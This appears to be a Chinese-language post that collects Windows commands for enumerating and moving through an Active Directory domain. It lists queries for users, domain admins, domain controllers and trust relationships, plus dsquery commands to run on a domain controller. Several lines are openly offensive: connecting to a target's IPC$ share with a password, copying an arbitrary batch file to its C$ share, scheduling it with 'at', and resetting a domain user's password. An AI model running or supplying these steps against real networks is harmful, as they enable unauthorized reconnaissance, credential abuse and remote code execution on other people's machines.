很多人都整理過這個,於是
ipconfig /all #查詢本機 IP 段,所在域等
net user //本機用戶列表
net localgroup administrators //查看本機管理員域管
net session // 查看當前會話
net use \\ip\ipc$ password /user:username // 建立域內 IPC 會話
net share //查看 SMB 指向的路徑
net view //查詢同一域內機器列表
net view /domain //查詢域列表
net start // 查看當前運行的服務
whoami //查詢賬號所屬權限
whoami/all //查看 sid 值
net accounts // 查看本地密碼策略
net accounts /domain // 查看域密碼策略
netstat –an //網絡連接查詢
route print //路由打印
nltest /dsgetdc:域名 //查詢域控主機名。 如 nltest /dclist:same
nltest /domain_trusts //可以列出域之間的信任關系
net view /domain:same //查看 same 域中計算機列表
net time /domain //判斷主域,主域服務器都做時間服務器
net config workstation // 當前登錄域
net group "enterprise admins" /domain 企業管理組
net user /domain lcx@same.com mima //修改域用戶密碼,需要域管理員權限
net user /domain // 查詢域用戶
net group /domain // 查詢域里面的工作組
net group "domain admins" /domain // 查詢域管理員用戶組
net localgroup administrators /domain //登錄本機的域管理員
net group "domain controllers" /domain // 查看域控制器(如果有多台)
net use \\192.168.25.203 Passw0rd! /user:admin //建立 ipc 連接
copy lcx.bat \\192.168.25.203\c$\adduser //復制 lcx.bat 到目標 C 盤 adduser 目錄,bat干啥都行
net time \\192.168.25.203 //查看目標當前時間,得到當前時間
at \\192.168.25.203 12:00 c:\adduser\lcx.bat //告訴目標在12點的時候運行bat
at \\192.168.25.203 //查看目標的計划任務列表
tasklist /V //查看進程,顯示對應用戶
tasklist /S ip /U domain\username /P /V //查看遠程計算機進程列表
qprocess * //類似tasklist
qprocess /SERVER:IP //遠程查看計算機進程列表
nslookup –qt-MX Yahoo.com //查看郵件服務器
set //查看系統環境變量
systeminfo //查看系統信息
qwinsta //查看登錄情況
qwinsta /SERVER:IP //查看遠程登錄情況
fsutil fsinfo drives // 查看所有盤符
gpupdate /force //更新域策略
域控中命令:
dsquery computer domainroot -limit 65535 && net group "domain computers" /domain //列出該域內所有機器名
dsquery user domainroot -limit 65535 && net user /domain //列出該域內所有用戶名
dsquery subnet //列出該域內網段划分
dsquery group && net group /domain //列出該域內分組
dsquery ou //列出該域內組織單位
dsquery server && net time /domain //列出該域內域控制器
隨便轉載,請標明作者出處